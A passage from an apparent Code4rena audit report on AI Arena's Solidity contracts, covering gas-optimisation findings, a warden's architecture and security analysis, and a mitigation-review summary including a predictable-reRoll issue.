            _voltageManagerInstance.ownerVoltageReplenishTime(fighterOwner) <= block.timestamp || 
            _voltageManagerInstance.ownerVoltage(fighterOwner) >= VOLTAGE_COST

This check is not necessary, since VoltageManager.spendVoltage() will revert if the voltage is too low:

    function spendVoltage(address spender, uint8 voltageSpent) public {
        require(spender == msg.sender || allowedVoltageSpenders[msg.sender]);
        if (ownerVoltageReplenishTime[spender] <= block.timestamp) {
        ownerVoltage[spender] -= voltageSpent; // UNDERFLOWS AND REVERTS IF VOLTAGE IS TOO LOW
        emit VoltageRemaining(spender, ownerVoltage[spender]);

Note that this check can also be performed offchain before calling updateBattleRecord().

Remove the require statement.

[G-08] RankedBattle._addResultPoints() can put code inside an existing conditional statement to avoid incrementing storage variables by zero


See the following code from the RankedBattle._addResultPoints() below. The points variable can be zero, such as if the player’s mergingFactor is 100. The lines updating storage variables with points should be put inside the if block.

            accumulatedPointsPerFighter[tokenId][roundId] += points;
            accumulatedPointsPerAddress[fighterOwner][roundId] += points;
            totalAccumulatedPoints[roundId] += points;
            if (points > 0) {
                emit PointsChanged(tokenId, points, true);
-           accumulatedPointsPerFighter[tokenId][roundId] += points;
-           accumulatedPointsPerAddress[fighterOwner][roundId] += points;
-           totalAccumulatedPoints[roundId] += points;
            if (points > 0) {
+               accumulatedPointsPerFighter[tokenId][roundId] += points;
+               accumulatedPointsPerAddress[fighterOwner][roundId] += points;
+               totalAccumulatedPoints[roundId] += points;
                emit PointsChanged(tokenId, points, true);

[G-09] RankedBattle._addResultPoints() executes unnecessary lines of code in case of a tie


RankedBattle._addResultPoints() runs all of the below code in case of a tie; it’s all setup for the win/lose code blocks, which make up the rest of the function. There’s no more code that runs in case of a tie. The only state modification in this function in case of a tie is updating the stakingFactor if it was not already updated, but since points/stake does not change in case of a tie the update is not necessary.

        uint256 stakeAtRisk;
        uint256 curStakeAtRisk;
        uint256 points = 0;

        /// Check how many NRNs the fighter has at risk
        stakeAtRisk = _stakeAtRiskInstance.getStakeAtRisk(tokenId);

        /// Calculate the staking factor if it has not already been calculated for this round 
        if (_calculatedStakingFactor[tokenId][roundId] == false) {
            stakingFactor[tokenId] = _getStakingFactor(tokenId, stakeAtRisk);
            _calculatedStakingFactor[tokenId][roundId] = true;

        /// Potential amount of NRNs to put at risk or retrieve from the stake-at-risk contract
        curStakeAtRisk = (bpsLostPerLoss * (amountStaked[tokenId] + stakeAtRisk)) / 10**4;

Cut the code above and paste it at the top of both the win and lose blocks.

[G-10] Unnecessary equality comparison in RankedBattle._updateRecord()


There are only three cases for battleResult, so below it’s not necessary to check the result 3 times. An else block can replace the second else if block.

    function _updateRecord(uint256 tokenId, uint8 battleResult) private {
        if (battleResult == 0) {
            fighterBattleRecord[tokenId].wins += 1;
        } else if (battleResult == 1) {
            fighterBattleRecord[tokenId].ties += 1;
        } else if (battleResult == 2) {
            fighterBattleRecord[tokenId].loses += 1;
-       } else if (battleResult == 2) {
+       } else {

[G-11] FighterFarm.sol inherits ERC721Enumerable but the codebase doesn’t use any of the enumerable methods


Solely inheriting ERC721 in the FighterFarm contract would save on deployment costs since the codebase doesn’t use the enumerable methods.

If desired, don’t inherit from ERC721Enumerable.

[G-12] Balance check in FighterFarm.reRoll() is not necessary since transferFrom() will revert in case of insufficient balance


In the function below, the balance require check is not necessary due to transferFrom() implementation.

    function reRoll(uint8 tokenId, uint8 fighterType) public {
        require(msg.sender == ownerOf(tokenId));
        require(numRerolls[tokenId] < maxRerollsAllowed[fighterType]);
        require(_neuronInstance.balanceOf(msg.sender) >= rerollCost, "Not enough NRN for reroll"); //Can delete

        _neuronInstance.approveSpender(msg.sender, rerollCost);
        bool success = _neuronInstance.transferFrom(msg.sender, treasuryAddress, rerollCost); //Will revert if balance is insufficient

Delete the balanceOf() require check.

[G-13] FighterFarm._beforeTokenTransfer() can be deleted to save an extra function call


Note the code below:

contract FighterFarm is ERC721, ERC721Enumerable {
    function _beforeTokenTransfer(address from, address to, uint256 tokenId)
        override(ERC721, ERC721Enumerable)
        super._beforeTokenTransfer(from, to, tokenId);

Inheritance in solidity is right-to-left and super._beforeTokenTransfer(from, to, tokenId); will call the _beforeTokenTransfer() method in ERC721Enumerable. Therefore, this function can be deleted and the functionality will be the same while eliminating an extra function call and saving gas.

Remove FighterFarm._beforeTokenTransfer().

[G-14] FighterFarm._createFighterBase() performs unnecessary check when minting dendroid


Notice below that _createNewFighter() only uses newDna when calling AiArenaHelper.createPhysicalAttributes():

    function _createNewFighter(
        uint256 element; 
        uint256 weight;
        uint256 newDna;
        if (customAttributes[0] == 100) {
            (element, weight, newDna) = _createFighterBase(dna, fighterType);
        else {
            element = customAttributes[0];
            weight = customAttributes[1];
            newDna = dna;
        uint256 newId = fighters.length;

        bool dendroidBool = fighterType == 1;
        FighterOps.FighterPhysicalAttributes memory attrs = _aiArenaHelperInstance.createPhysicalAttributes(
        //newDna is not used after this point
    function _createFighterBase(
        uint256 dna, 
        uint8 fighterType
        returns (uint256, uint256, uint256) 
        uint256 element = dna % numElements[generation[fighterType]];
        uint256 weight = dna % 31 + 65;
        uint256 newDna = fighterType == 0 ? dna : uint256(fighterType); //This check is not needed
        return (element, weight, newDna);

The above check in _createFighterBase() that sets dendroid fighters’ (fighterType equals 1) newDna to a different value is not necessary, because newDna will not be used in AiArenaHelper.createPhysicalAttributes() when creating a dendroid and there are only two fighter types:

    function createPhysicalAttributes(
        uint256 dna, 
        uint8 generation, 
        uint8 iconsType, 
        bool dendroidBool
        returns (FighterOps.FighterPhysicalAttributes memory) 
        if (dendroidBool) {
            return FighterOps.FighterPhysicalAttributes(99, 99, 99, 99, 99, 99);

Instances of newDna can be removed and dna used instead, since dna will not change for non-dendroid fighters and newDna is not used when creating a dendroid fighter.

[G-15] MergingPool.claimRewards() should update numRoundsClaimed after the loop ends instead of incrementing it in every loop


The below code is not gas efficient due to SSTORE/SLOAD of the numRoundsClaimed state variable in every loop.

    function claimRewards(
        string[] calldata modelURIs, 
        string[] calldata modelTypes,
        uint256[2][] calldata customAttributes
        uint256 winnersLength;
        uint32 claimIndex = 0;
        uint32 lowerBound = numRoundsClaimed[msg.sender];
        for (uint32 currentRound = lowerBound; currentRound < roundId; currentRound++) {
            numRoundsClaimed[msg.sender] += 1;

Instead of incrementing the state variable in every loop, increment a local variable and then update the state variable after the loop ends.

[G-16] MergingPool.pickWinner() and MergingPool.claimRewards() can be refactored so that users don’t have to iterate through the entire array of winners for every round


Notice how claimRewards() detects if the caller has rewards to claim in a round:

            winnersLength = winnerAddresses[currentRound].length;
            for (uint32 j = 0; j < winnersLength; j++) {
                if (msg.sender == winnerAddresses[currentRound][j]) {

This method is very gas inefficient since winnerAddresses is in storage.

Instead of iterating through all the winner addresses in every round, MergingPool.pickWinner() and MergingPool.claimRewards() could be refactored to increment a new state variable tracking number of rewards (per round, if desired).

[G-17] DNA rarity calculation in AiArenaHelper.dnaToIndex() can be redesigned to save gas


dnaToIndex() is called inside a loop for all the fighter physical properties (see first link), which consumes a lot of gas due to storage loads. The system of calculating attributeProbabilityIndex by looping through the probabilities and comparing the cumProb to rarityRank could be refactored to retain the same functionality but save a lot of gas.

dnaToIndex() function below for reader convenience:

    function dnaToIndex(uint256 generation, uint256 rarityRank, string memory attribute) 
        returns (uint256 attributeProbabilityIndex) 
        uint8[] memory attrProbabilities = getAttributeProbabilities(generation, attribute);
        uint256 cumProb = 0;
        uint256 attrProbabilitiesLength = attrProbabilities.length;
        for (uint8 i = 0; i < attrProbabilitiesLength; i++) {
            cumProb += attrProbabilities[i];
            if (cumProb >= rarityRank) {
                attributeProbabilityIndex = i + 1;
        return attributeProbabilityIndex;

Refactor attribute index/rarity calculation.

[G-18] AiArenaHelper.createPhysicalAttributes() should check for iconsType before running icons-relevant code since icons fighters are rare


Since icon fighter NFTs are rare, the below checks related to icons should not run for non-icon fighters.

            for (uint8 i = 0; i < attributesLength; i++) {
                if (
                  i == 0 && iconsType == 2 || // Custom icons head (beta helmet)
                  i == 1 && iconsType > 0 || // Custom icons eyes (red diamond)
                  i == 4 && iconsType == 3 // Custom icons hands (bowling ball)
                ) {
                    finalAttributeProbabilityIndexes[i] = 50;
                } else {
                    //set finalAttributeProbabilityIndexes[i] a different way

Instead of running through all 3 icons checks every time, check to see if iconsType is greater than zero before running through the 3 checks.

[G-19] AiArenaHelper constructor sets probabilities twice


Notice below that the constructor sets the probabilities twice:

    constructor(uint8[][] memory probabilities) {
        _ownerAddress = msg.sender;

        // Initialize the probabilities for each attribute
        addAttributeProbabilities(0, probabilities);

        uint256 attributesLength = attributes.length;
        for (uint8 i = 0; i < attributesLength; i++) {
            attributeProbabilities[0][attributes[i]] = probabilities[i];
            attributeToDnaDivisor[attributes[i]] = defaultAttributeDivisor[i];

Remove the for loop.

brandinho (AI Arena) confirmed

Audit Analysis

For this audit, 42 analysis reports were submitted by wardens. An analysis report examines the codebase as a whole, providing observations and advice on such topics as architecture, mechanism, or approach. The report highlighted below by 0xSmartContract received the top score from the judge.

The following wardens also submitted reports: yongskiws, 0xepley, aariiif, hunter_w3b, ZanyBonzy, 14si2o_Flint, klau5, popeye, 0xweb3boy, rspadi, hassanshakeel13, ansa-zanjbeel, Rolezn, cheatc0d3, peanuts, tala7985, 0xbrett8571, wahedtalash77, fouzantanveer, foxb868, Myd, 0xblack_bird, 0xDetermination, cudo, 0xStriker, SAQ, clara, scokaf, 0xAsen, albahaca, dimulski, McToady, K42, PoeAudits, JayShreeRAM, pipidu83, shaflow2, Bauchibred, JcFichtner, DarkTower, and kaveyjoe.


List Head Details
a) The approach I followed when reviewing the code Stages in my code review and analysis
b) Analysis of the code base What is unique? How are the existing patterns used? “Solidity-metrics” was used
c) Test analysis Test scope of the project and quality of tests
d) Security Approach of the Project Audit approach of the Project
e) Other Audit Reports and Automated Findings What are the previous Audit reports and their analysis
f) Packages and Dependencies Analysis Details about the project Packages
g) Other recommendations What is unique? How are the existing patterns used?
h) New insights and learning from this audit Things learned from the project


First, by examining the scope of the code, I determined my code review and analysis strategy.

Accordingly, I analyzed and audited the subject in the following steps;

Number Stage Details Information
1 Compile and Run Test Installation Test and installation structure is simple, cleanly designed
2 Architecture Review AI Arena Provides a basic architectural teaching for General Architecture
3 Graphical Analysis Graphical Analysis with Solidity-metrics A visual view has been made to dominate the general structure of the codes of the project.
4 Slither Analysis Slither Report
5 Test Suits Tests In this section, the scope and content of the tests of the project are analyzed.
6 Manuel Code Review Scope
7 Infographic Figma I made Visual drawings to understand the hard-to-understand mechanisms
8 Special focus on Areas of Concern Areas of Concern

Analysis of the code base

The most important summary in analyzing the code base is the stacking of codes to be analyzed. In this way, many predictions can be made, including the difficulty levels of the contracts, which one is more important for the auditor, the features they contain that are important for security (payable functions, uses assembly, etc.), the audit cost of the project, and the time to be allocated to the audit

In addition, the auditor can decide on the question of where should I end the audit by examining these metrics;

Uses Consensys Solidity Metrics

  • Lines: total lines of the source unit
  • nLines: normalized lines of the source unit (e.g. normalizes functions spanning multiple lines)
  • nSLOC: normalized source lines of code (only source-code lines; no comments, no blank lines)
  • Comment Lines: lines containing single or block comments
  • Complexity Score: a custom complexity score derived from code statements that are known to introduce code complexity (branches, loops, calls, external interfaces, …)

Project - Entry Point - FighterFarm.sol ;

  1. The reRoll function implements business logic after the _neuronInstance.transferFrom call. This may result in the reRoll function being called again and causing unexpected behavior. Always implement business logic before the call
  2. DoS: The redeemMintPass function uses a loop to burn multiple mint passes. If the burn operation for a mintpassIdToBurn fails, the entire operation is rolled back. This could lead to a malicious user making this function of the contract unusable, causing the transaction to fail.

    • Recommendation: Manage each burn operation separately using try-catch and log the failed ones.
  3. Unchecked Return Values: The return value of the _neuronInstance.transferFrom call in the reRoll function is not checked. This could cause the transaction to fail silently if the transfer fails.

    • Recommendation: Check the return value to verify that the transfer was successful.
  4. Front-Running: claimFighters and redeemMintPass functions allow users to create NFTs based on certain parameters. Publicly publishing these parameters (e.g., modelHashes) on the blockchain carries the risk that malicious users can see the transaction and take action in their favor (e.g., pre-snatch more valuable NFTs).

    • Recommendation: Prevent such front-running attacks by using commit-reveal scheme.

Gas Optimizations

  1. Gas Optimization: Frequently used length calls within for loops can increase gas costs. Especially in the redeemMintPass and claimFighters functions, the loop calls fighters.length at each iteration.

    • Suggestion: Store length in a variable before the loop and use this variable inside the loop.
  2. Use of ERC721 and ERC721Enumerable: ERC721Enumerable maintains a list of all tokens, which can significantly increase gas costs for large collections.

    • Recommendation: If your collection is large and the list of tokens owned by each user is not needed frequently, you may consider removing ERC721Enumerable.


Note: Please click on the image to enlarge it


1. DoS (Denial of Service) Risk:

  • The updateBattleRecord function may consume a lot of gas under certain conditions or be exploited by a malicious user. For example, very high eloFactor values may cause the operation to fail.

2. Magic Numbers:

  • Constant values such as VOLTAGE_COST or bpsLostPerLoss are used directly in various places in the code. Documenting the meaning of these values and why they were chosen makes the code easier to read and maintain.

3. Function Visibility and Modifiers:

  • Using modifier for authorization checks reduces code repetition and increases readability.

Gas Optimizations

1. Optimization on Frequently Called Functions:

  • It is important to optimize calculations to reduce gas costs in frequently called functions such as updateBattleRecord. For example, calculations with constant values can be precomputed.

2. Loops and Big Data Structures:

  • Using loops on large data structures can increase gas cost. In functions like getUnclaimedNRN, limiting the maximum number of rounds users can take or organizing data structures more efficiently can save gas.

3. Optimization of Access to State Variables:

  • Gas can be saved by copying frequently accessed state variables to memory variables and performing operations on these variables.

Note: Please click on the image to enlarge it


This Solidity contract includes a management and reward distribution mechanism that provides a number of special functionalities. Below are brief summaries of the contract’s functions and constructor:


  • Constructor: The contract owner sets the ranked battle contract and warrior farm contract addresses. The contract identifies the owner as an admin.

External Functions

  • transferOwnership: Transfers contract ownership to another address. Can only be summoned by the current owner.
  • adjustAdminAccess: Grants or removes admin access to a specific address. Can only be summoned by its owner.
  • updateWinnersPerPeriod: Updates the number of winners per contest period. It can only be called by admins.
  • pickWinner: Picks the winners for the current round. The number of winners must match the expected number of winners per period. It can only be called by admins.
  • claimRewards: Allows users to collectively claim rewards for multiple rounds. The user can only claim rewards once per round.

Public Functions

  • addPoints: Adds merge pool points to a warrior. It can only be summoned by the ranked battle contract address.
  • getFighterPoints: Gets points of fighters up to the specified maximum token ID.

Architecture Summary This contract provides a reward and management system for warriors. Warriors can earn points through ranked battles and other events. Admins can select winners during certain periods, and these winners can claim their rewards to create new fighters with specific model URIs, model types, and special features. Users can view and claim the number of rewards they have earned.

The contract protects management functions with a strict access control mechanism, allowing only certain addresses (owner and admins) to perform management functions and reward distribution. This ensures the security of the contract and the correct use of its functionality. It also offers a mechanism to manage points from ranked battles and other events, rewarding warriors’ performance and participation.


Note: Please click on the image to enlarge it

Contract Details - MergingPool.sol ;


Note: Please click on the image to enlarge it


It functions as the AI Arena utility and enables the creation of physical attributes for a particular fighter.

State Variables

  • attributes: List of attributes that fighters can have (e.g. “head”, “eyes”, etc.).
  • defaultAttributeDivisor: Default values of each attribute’s DNA dividers.
  • _ownerAddress: Address of the contract owner.
  • attributeProbabilities: A mapping that keeps track of attribute probabilities for each generation.
  • attributeToDnaDivisor: A mapping that keeps track of the DNA dividers specific to each attribute.


  • When starting the contract, sets the trait probabilities for generation 0 and initializes the DNA splitter of each trait with default values.

External Functions

  • transferOwnership: Transfers contract ownership to another address.
  • addAttributeDivisor: Adds or updates DNA dividers for each attribute.
  • createPhysicalAttributes: Creates a fighter’s physical attributes based on the given DNA, lineage, icon type and dendroid status.

Public Functions

  • addAttributeProbabilities: Adds attribute probabilities for a given generation.
  • deleteAttributeProbabilities: Deletes attribute probabilities for a given generation.
  • getAttributeProbabilities: Returns attribute probabilities for a given generation and trait.
  • dnaToIndex: Converts the given DNA and its rarity into a trait probability index.

Architectural Summary

This contract is designed to manage the characteristics of fighters in the AI Arena. The contract contains complex logic used to create fighters’ physical attributes. It governs DNA splitters for each trait and trait probabilities that vary across generations.


Note: Please click on the image to enlarge it

  1. Hard Coded Limitations: Within the createPhysicalAttributes function there are hard coded control structures for some attributes (e.g. special cases based on iconsType values). This approach may limit the extensibility and flexibility of the contract.

    • Recommendation: Consider managing such controls through an external configuration or management mechanism to enable more dynamic management of features and behaviors.
  2. Role Based Access Control: The contract authorizes the owner to perform administrative functions (e.g. transferOwnership, addAttributeDivisor). However, this may not be enough for growing projects that may require more complex access control mechanisms.

    • Recommendation: Create a more flexible and secure role-based access control system using OpenZeppelin’s AccessControl contract.
  3. Data Validation: Validating input data is important, especially when it comes to outsourced parameters. Functions such as addAttributeProbabilities and addAttributeDivisor check input lengths, but more extensive validations may be required.

    • Recommendation: Add comprehensive validation mechanisms to ensure accuracy and validity of input data.


This contract provides management of in-game items for AI Arena. It supports multiple token types using the ERC1155 standard.

  1. DoS by Block Gas Limit: The mint function, especially in combination with the finiteSupply control and the dailyAllowance control, performs multiple operations in a loop. If these transactions consume too much gas, the block may reach its gas limit and cause transactions to fail.

    • Recommendation: Limit the maximum amount users can mint at once or optimize transactions to reduce gas usage.
  2. Unchecked External Call Return Values: The return value of the _neuronInstance.transferFrom call is not checked in the mint function. This could cause the transaction to fail silently if the transfer fails.

    • Recommendation: Check the return value of the ERC20 transferFrom function and throw an appropriate error message if the operation fails.
  3. Magic Strings and Numbers: “Magic strings” and “magic numbers” are used in many places in the contract, especially in URI management and time intervals.

    • Recommendation: Make the code easier to read and maintain by replacing magic numbers and strings with constants.
  4. Role-Based Access Control (RBAC): Managing roles such as isAdmin and allowedBurningAddresses may require more complex access control mechanisms.

    • Recommendation: Provide more flexible and secure role-based access control using OpenZeppelin’s AccessControl contract.


Note: Please click on the image to enlarge it

/// @notice Returns the URI where the contract metadata is stored.
    /// @return URI where the contract metadata is stored.
    function contractURI() public pure returns (string memory) {
        return "ipfs://bafybeih3witscmml3padf4qxbea5jh4rl2xp67aydqvqsxmyuzipwtpnii";

function return value;
  "name": "AI Arena Game Items",
  "description": "In-game items to be used while playing AI Arena",
  "image": "",
  "external_link": "",
  "seller_fee_basis_points": 800,
  "fee_recipient": "0xd82F671a08DBb96Fff1334EE7992ce2E1A219c7C"

Both IPFS and Arweave store data immutably, but Arweave guarantees permanent storage with a one-time fee.

IPFS (InterPlanetary File System) and Arweave offer decentralized file storage solutions, but with key differences and security benefits that vary depending on use cases. The importance of using Arweave from a security perspective is particularly evident in persistent storage and data integrity issues.

Security Benefits of Arweave

  1. Persistent Storage: Arweave permanently stores data in a structure called a “block mesh”. This means that once uploaded to Arweave, it is not possible for data to be deleted or lost. This feature provides a significant security benefit for data that must not be deleted or altered, such as copyright material, legal documents, or historical records.
  2. Data Integrity: Arweave guarantees data integrity by using the hash value of each stored item. This means that stored data cannot be modified or corrupted over time. Users can be assured that the data they store is original and will remain unchanged.
  3. Economic Incentives: Arweave offers economic incentives for data storage and access. Payment is made for storing data, and this payment guarantees that the data is permanently stored on the network. This solves the problem that data encountered in IPFS can be lost over time, because in IPFS nodes must actively host and pin data for data to remain constantly accessible.
  4. Greater Security and Durability: Arweave’s persistent storage model offers an extra layer of protection against data being censored or altered. This is especially important in situations where censorship or data manipulation is a concern.

To Compare

  • IPFS stores and shares data in a decentralized manner, but nodes must actively host that data for it to remain constantly accessible. Extra steps (e.g. using pinning services) may be required to permanently store data in IPFS.
  • Arweave differs from IPFS in storing data persistently and providing high data integrity. Arweave guarantees that once you store data, it will be retained forever.

As a result, Arweave’s security relevance is particularly evident in areas such as persistent storage, data integrity, and censorship resistance.

Test analysis

What did the project do differently?

  • It can be said that the developers of the project did a quality job, there is a test structure consisting of tests with quality content.

Test Coverage and Depth

  • Wide Function Testing: Test files cover many parts of your contracts (%90 Coverage). This means you check if every part of your system works in different situations.
  • Both Good and Bad Scenarios: Test files look at both when things go right and when they should fail and give an error. This makes sure your contracts can handle unexpected situations well.

Testing Strategies and Approaches

  • Looking at Edge Cases: Test files think about special or extreme situations to make sure your contracts can handle them.
  • Focus on Security: Tests like RankedBattleTest check important parts of your contracts to keep them safe. This is very important for smart contracts.
  • Testing How Things Work Together: Test files also see how different contracts work with each other. This shows that your whole project works well as one system.

What could they have done better?

  • If we look at the test scope and content of the project with a systematic checklist, we can see which parts are good and which areas have room for improvement As a result of my analysis, those marked in green are the ones that the project has fully achieved. The remaining areas are the development areas of the project in terms of testing ;


  • Overall line coverage percentage provided by your tests : 90 (As a generally accepted safety rule, 100% test coverage is recommended)
  • Test Tools/Technologies analysis of the project;

Security Approach of the Project

Successful current security understanding of the project;

  1. They manage the 1nd audit process with an innovative audit such as Code4rena, in which many auditors examine the codes.

What the project should add in the understanding of Security;

  1. By distributing the project to testnets, ensuring that the audits are carried out in onchain audit. (This will increase coverage)
  2. After the project is published on the mainnet, there should be emergency action plans (not found in the documents)
  3. Add On-Chain Monitoring System; If On-Chain Monitoring systems such as Forta are added to the project, its security will increase.

For example ; This bot tracks any DEFI transactions in which wrapping, unwrapping, swapping, depositing, or withdrawals occur over a threshold amount. If transactions occur with unusually high token amounts, the bot sends out an alert.

  1. After the Code4rena audit is completed and the project is live, I recommend the audit process to continue, projects like immunefi do this.
  2. Emergency Action Plan In a high-level security approach, there should be a crisis handbook like the one below and the strategic members of the project should be trained on this subject and drills should be carried out. Naturally, this information and road plan will not be available to the public.
  3. ChainAnalysis oracle With the ChainAnalysis oracle, OFAC interaction can be blocked so that legal issues do not arise
  4. We also recommend that you have an “Economic Audit” for projects based on such complex mathematics and economic models. An example Economic Audit is provided in the link below; Economic Audit with Three Sigma
  5. As the project team, you can consider applying the multi-stage audit model.

Read more about the MPA model;

  1. I recommend having a masterplan applied to project team members (This information is not included in the documents). All authorizations, including NPM passwords and authorizations, should be reserved only for current employees. I also recommend that a definitive security constitution project be found for employees to protect these passwords with rules such as 2FA. The LEDGER hack, which has made a big impact recently, is the best example in this regard;

  1. Another security approach I can recommend is 0xDjango’s security approaches in a project. This approach divides security into layers (Test, Automatic Tool, Individual Audit, Corporate Audit, Economic Audit) and aims to have each part done separately by experts in the field. I can also recommend this approach to you;

Other Audit Reports and Automated Findings

Automated Findings:

The Automated analysis identifies several security-related issues, such as potential Denial of Service (DOS) attacks through unbounded loops ([M-01], [L-05]), lack of proper validation for array lengths ([L-06]), and the absence of checks for null addresses ([L-07], [L-12]). Addressing these issues is crucial for preventing attacks that could compromise contract integrity and user assets.

Centralization Risk

Owner Role

  1. Single Point Failure Risk: If the private key under the control of _ownerAddress is compromised or lost, the entire system is compromised.
  2. Risk of Abuse of Authority: The contract owner may abuse his powers, for example, arbitrarily transfer funds or change roles in the system.

Code Pattern Used

By using require(msg.sender == _ownerAddress); it follows a pattern that ensures that certain functions can only be called by the contract owner. This indicates a centralized management model.


  1. Multisig Mechanism: A multi-signature mechanism can be used that shares the powers of the contract owner among more than one address. This reduces the risk of a single point of failure and prevents abuse of authority.
  2. Transition to DAO Structure: Moving project management and decision-making processes to a DAO (Decentralized Autonomous Organization) structure gives community members more say and reduces centralization.
  3. Time Lock and Escalation Mechanisms: A time lock mechanism can be implemented so that critical functions can be called. This prevents sudden changes and gives the community a chance to review upgrades and changes.

Packages and Dependencies Analysis 📦

Package Version Usage in the project Audit Recommendation
openzeppelin npm A lot of OZ contracts - Version 4.7.3 is used by the project, it is recommended to use the newest version 5.0.1

Other recommendations

✅ The use of assembly in project codes is very low, I especially recommend using such useful and gas-optimized code patterns;

✅ A good model can be used to systematically assess the risk of the project, for example this modeling is recommended;

✅ All staff accounts for the project should have control policies that require 2FA and must use 2FA wherever possible.

  • 100% comprehensive security cannot be achieved based on smart contract codes alone.
  • Implement a more comprehensive policy to enforce non-SMS 2FA.
  • You can find the latest Simswap attack on Code4rena and details about it in this article.

✅ I recommend you to set up a system.sol basic architecture where all contracts are registered.

  • The entire system can revolve around a single contract, like SystemRegistry. This is the contract that ties all the other contracts together, and from this contract we should be able to list all the other contracts in the system. It’s almost like a registry.

✅ Analyze the gas usage of each function under various conditions in tests to ensure efficiency and identify potential optimizations.

Time spent:

24 hours

brandinho (AI Arena) acknowledged:

hickuphh3 (judge) commented:

Most comprehensive analysis out of all I’ve seen, though there is room for improvement in the signal to noise ratio.

Mitigation Review


Following the C4 audit, 3 wardens (d3e4, fnanni, and niser93) reviewed the mitigations for all identified issues. Additional details can be found within the C4 AI Arena Mitigation Review repository.

Overview of Changes

Summary from the Sponsor:

  • Fixed issues with tokenId restrictions: There was an issue when re-rolling for fighters with token IDs greater than 255 which has been addressed.
  • Override fixes in safeTransferFrom
  • DNA generation fixes: Issues in the generation process during minting from the merging pool and in the re-roll and claim functions have been fixed.
  • Non-transferable GameItems fix: There was a bug that allowed non-transferable game items to be transferred, which has been fixed.
  • Mitigation of reentrancy in claimRewards: Reentrancy attack was mitigated.
  • Uninitialized numElements variable: An uninitialized variable numElements was fixed.
  • ECRecover vulnerability: A known vulnerability with ECRecover was addressed.
  • Update to ranking and staking mechanisms: There were fixes to staking requirements and an update to ranked battle contracts.

Areas of specific concern would be:

  • Reentrancy vulnerabilities.
  • Signature malleability in ECRecover.
  • Non-transferable items being transferred.

Mitigation Review Scope


Mitigations branch

Mitigations of High & Medium Severity Issues

URL Mitigation of Original Issue Purpose H-01 #739 Fixed safeTransferFrom override with data H-02 #575 fixed Non-transferable GameItems being transferred with GameItems::safeBatchTransferFrom H-03 #366 Mitigation for Players have complete freedom to customize the fighter NFT when calling redeemMintPass and can redeem fighters of types Dendroid and with rare attributes H-04 #306 H-06 #68 Fixed reRoll for fighters with tokenIds greater than 255 H-07 #45 H-08 #37 M-03 #932 M-04 #868 Mitigation for DoS in MergingPool::claimRewards function and potential DoS in RankedBattle::claimNRN function if called after a significant amount of rounds passed. & M-05 #1017 & #578 Updated dna generation in reRoll and updated dna generation in claimFighters. Also, fixed dna generation in mintFromMergingPool. M-06 #137 Mititgation for NFTs can be transferred even if StakeAtRisk remains, so the user’s win cannot be recorded on the chain due to underflow, and can recover past losses that can’t be recovered(steal protocol’s token) M-08 #47

Additional scope to be reviewed

These are additional changes in scope for the mitigation review.

URL Reference ID Original Issue Purpose ADD-01 #48 Mitigated claimRewards reentrancy, fixed uninitialized numElements and fixed points intialization to match maxId ADD-02 #507 Fixed Ecrecover is known to be vulnerable to signature malleability ADD-03 #704 Mititgated QA Report for #704 ADD-04 #1490 Mitigated unstakeNRN and setNewRound and mint upto MAX_SUPPLY ADD-05 N/A Admin setup function and new require conditions for staking and unstaking. Unstaking require correction ADD-06 N/A Mitigation for gas intensive setUpAirdrop function and airdrop mechanism. Missing finalized test for new airdrop mechanism but working Airdrop script based on merkle root and proof.

Mitigation Review Summary

During the mitigation review, the wardens determined that 4 in-scope findings were not fully mitigated, from the original audit. They also surfaced several new issues (5 Medium severity and 1 Low severity/Non-critical). The table below provides details regarding the status of each vulnerability from the original audit that was in-scope for the mitigation review, followed by full details on the new issues and any in-scope vulnerabilities that were not fully mitigated.

Original Issue Status of Original Issue Full Details
H-01 🟢 Mitigation Confirmed Reports from niser93, d3e4, and fnanni
H-02 🟢 Mitigation Confirmed Reports from niser93, d3e4, and fnanni
H-03 🟢 Mitigation Confirmed Reports from niser93 and fnanni
H-04 🟢 Mitigation Confirmed Reports from niser93, d3e4, and fnanni
H-06 🟢 Mitigation Confirmed Reports from niser93, d3e4, and fnanni
H-07 🟢 Mitigation Confirmed Reports from niser93, d3e4, and fnanni
H-08 🟢 Mitigation Confirmed Reports from niser93, d3e4, and fnanni
M-03 🔴 Unmitigated Reports from fnanni and niser93 (1, 2) - details also shared below
M-04 🟢 Mitigation Confirmed Reports from niser93, fnanni, and d3e4
M-05 🔴 Unmitigated Reports from fnanni, niser93 (1, 2), and d3e4 (1, 2, 3) - details also shared below
M-06 🔴 Unmitigated Report from d3e4 - details also shared below
M-08 🔴 Unmitigated Report from d3e4 - details also shared below
ADD-01 🟢 Mitigation Confirmed Reports from niser93 and fnanni
ADD-02 🟢 Mitigation Confirmed Reports from d3e4, fnanni, and niser93
ADD-03 🟢 Mitigation Confirmed Reports from fnanni and niser93
ADD-04 🟢 Mitigation Confirmed Reports from niser93 and fnanni
ADD-05 🟢 Mitigation Confirmed Reports from fnanni and niser93
ADD-06 🟢 Mitigation Confirmed Reports from fnanni and niser93

FighterFarm.reRoll() method works wrong and allows minting wanted attributes

Submitted by niser93, also found by fnanni

Severity: Medium

Related to the mitigation of: M-05 and its duplicates.

Each fighter has a specific number of max reRolls, according to fighterType. This means that the owner of the fighter can call FighterFarm.reRoll() at most maxRerollsAllowed times, in order to obtain better fighter’s attributes.

We want to underline three aspects:

  • FighterFarm.reRoll() operation has a cost in NRN
  • numRerolls of a specific fighter is not reset when it is transfered
  • dna is the only value used to compute fighter’s traits. After mitigation, dna depends just on tokenId and numRerolls[tokenId]

Because the reasons above, the owner of a fighter can always forecast what is the best number of reRolls.
So, a cunning player should always improve its fighter’s traits using the right number of reRolls. For this reason, we could expect that all fighters will be reRolled until they reach the best number of reRolls.
Furthermore, a malicious player can wait for the right tokenId which can be used in reRoll operation to obtain a very rare fighter.

Remaining reRolls of a fighter don’t increase its value

We asked in a private thread a clarification on the FighterFarm.reRoll() mechanism. This was the answer:

I: I've another question on reRoll method. A fighter can be reRolled several times. 
The limit is the MasRerollsAllowed value. When a fighter is transferred from a player to other,
the numRerolls value is not reset. This means that the onwer can't reRoll the receive fighter, if
the previous owner used all roll changes. Also this is a wanted behavior?

Dev: Yes this is intended. You can think of this as someone potentially paying a premium for an NFT that has 
more reRolls remaining. They should be intrinsically more valuable since they have more optionality.

While this was true before the mitigation, now the dna doesn’t depend on msg.sender anymore. This means that the outcomes of reRoll operations made by the seller is the same of the outcomes obtained by the buyer. If they are both cunning players, they know before the transfer if that fighter would improve using FighterFarm.reRoll() operation or not.

